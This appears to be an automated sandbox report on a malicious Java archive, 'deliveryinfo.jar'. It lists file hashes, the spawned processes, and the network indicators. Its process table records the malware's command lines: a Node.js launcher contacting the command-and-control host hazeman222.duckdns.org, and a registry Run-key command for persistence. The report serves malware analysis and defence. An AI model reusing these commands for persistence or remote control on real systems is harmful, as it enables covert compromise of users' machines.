download: | deliveryinfo.jar |
Full analysis: | https://app.any.run/tasks/69b5f90c-a108-492e-91e2-cc47f6913d4f |
Verdict: | Malicious activity |
Analysis date: | September 30, 2020, 02:49:40 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/java-archive |
File info: | Java archive data (JAR) |
MD5: | 724141C6922AB8E19C262D269AA8AEE1 |
SHA1: | 0D2BF53FA5138AA22B1585F5C5093DFBE65DFCD0 |
SHA256: | A3B9D353EF66B0E9F9920E9F4D520E67E40F9F8AC855EDF42BFA3BE4492FCF1D |
SSDEEP: | 12288:whSM3uQPBuy9mwsG+BXT4zsvuXEAr/qWy5khwG/:whSUuQpBxsG+NT4dXrriWGSH/ |
.jar | | | Java Archive (78.3) |
---|---|---|
.zip | | | ZIP compressed archive (21.6) |
ZipFileName: | META-INF/ |
---|---|
ZipUncompressedSize: | - |
ZipCompressedSize: | 2 |
ZipCRC: | 0x00000000 |
ZipModifyDate: | 2020:09:25 16:24:26 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0808 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3656 | "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\deliveryinfo.jar" | C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe | — | explorer.exe |
User: admin Company: Oracle Corporation Integrity Level: MEDIUM Description: Java(TM) Platform SE binary Exit code: 0 Version: 8.0.920.14 | ||||
3360 | "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar C:\Users\admin\AppData\Local\Temp\91203cef.tmp | C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe | javaw.exe | |
User: admin Company: Oracle Corporation Integrity Level: MEDIUM Description: Java(TM) Platform SE binary Exit code: 0 Version: 8.0.920.14 | ||||
3460 | C:\Users\admin\node-v14.12.0-win-x86\node.exe - --hub-domain hazeman222.duckdns.org | C:\Users\admin\node-v14.12.0-win-x86\node.exe | javaw.exe | |
User: admin Company: Node.js Integrity Level: MEDIUM Description: Node.js: Server-side JavaScript Exit code: 0 Version: 14.12.0 | ||||
3132 | C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.org | C:\Users\admin\node-v14.12.0-win-x86\node.exe | — | node.exe |
User: admin Company: Node.js Integrity Level: MEDIUM Description: Node.js: Server-side JavaScript Version: 14.12.0 | ||||
3932 | C:\Users\admin\node-v14.12.0-win-x86\node.exe C:\Users\admin\AppData\Local\Temp\_qhub_node_b4Cqun\boot.js --hub-domain hazeman222.duckdns.org | C:\Users\admin\node-v14.12.0-win-x86\node.exe | node.exe | |
User: admin Company: Node.js Integrity Level: MEDIUM Description: Node.js: Server-side JavaScript Version: 14.12.0 | ||||
2788 | C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "75f43e1b-f848-4a9d-9715-4f0bfcbdd71a" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\""" | C:\Windows\system32\cmd.exe | — | node.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2432 | REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "75f43e1b-f848-4a9d-9715-4f0bfcbdd71a" /t REG_SZ /F /D "cmd /D /C \"C:\Users\admin\qhub\node\2.0.10\boot.vbs\"" | C:\Windows\system32\reg.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (2432) reg.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run |
Operation: | write | Name: | 75f43e1b-f848-4a9d-9715-4f0bfcbdd71a |
Value: cmd /D /C "C:\Users\admin\qhub\node\2.0.10\boot.vbs" |
PID | Process | Filename | Type | |
---|---|---|---|---|
3360 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\node.exe | — | |
MD5:— | SHA256:— | |||
3360 | javaw.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | text | |
MD5:9FF345D67D3E86AA13748F32859F0623 | SHA256:D580EB3395C1986C8BE63EA57F27C03102506A465A4B060C6FA252DB908BDE09 | |||
3656 | javaw.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | text | |
MD5:3B0324B3E0F429E28588DE1DF7C625AA | SHA256:9660032A03EA9330665C227ECDB00A0C316F73914C3B684A142E805F7AE0DC2C | |||
3656 | javaw.exe | C:\Users\admin\AppData\Local\Temp\91203cef.tmp | java | |
MD5:724141C6922AB8E19C262D269AA8AEE1 | SHA256:A3B9D353EF66B0E9F9920E9F4D520E67E40F9F8AC855EDF42BFA3BE4492FCF1D | |||
3360 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\node_modules\npm\.mailmap | text | |
MD5:50FF5F4745B5210D1DDC6CB3AD21216B | SHA256:EC219650D5ED44D58B1F6CD6E8CCC116E118D7569E09ED19E9B80F5C8BE87D5B | |||
3360 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\node_modules\npm\.licensee.json | text | |
MD5:B133415ABE39E5C1865AAD84712B3941 | SHA256:66218BC67A524799BA7CCAD7C493A8D24EEED81C07BED24E0C3034ABA6014061 | |||
3360 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\node_modules\npm\.travis.yml | text | |
MD5:3A7ED115415E15A00FC5911C72DA7812 | SHA256:B4080A2F674C7036830858C9EF6731BE83CC210B2C13ADE7CC4C9567163615CC | |||
3360 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\nodevars.bat | text | |
MD5:E6636C5B093F5CC13DFB7508305B8D8B | SHA256:A2B020E2F641524C6FD1B8EBBCD9EE03C7DC44009F2B78E701E773AD048BE9A5 | |||
3360 | javaw.exe | C:\Users\admin\node-v14.12.0-win-x86.tmp298787923764\node-v14.12.0-win-x86\install_tools.bat | text | |
MD5:2CD17E6D9A33A0BD00C2E18E6D41BC6F | SHA256:C7C05DE977EEFD931B54B482405C87A2F002AF3BC83A9C2FECA21B05915983B9 | |||
3360 | javaw.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\83aa4cc77f591dfc2374580bbd95f6ba_90059c37-1320-41a4-b58d-2b75a9850d2f | dbf | |
MD5:C8366AE350E7019AEFC9D1E6E6A498C6 | SHA256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3460 | node.exe | 94.156.189.108:443 | hazeman222.duckdns.org | BelCloud Hosting Corporation | BG | unknown |
3932 | node.exe | 94.156.189.108:443 | hazeman222.duckdns.org | BelCloud Hosting Corporation | BG | unknown |
3360 | javaw.exe | 104.20.22.46:443 | nodejs.org | Cloudflare Inc | US | shared |
3932 | node.exe | 95.217.228.176:443 | wtfismyip.com | Hetzner Online GmbH | DE | malicious |
Domain | IP | Reputation |
---|---|---|
nodejs.org |
| whitelisted |
hazeman222.duckdns.org |
| malicious |
wtfismyip.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |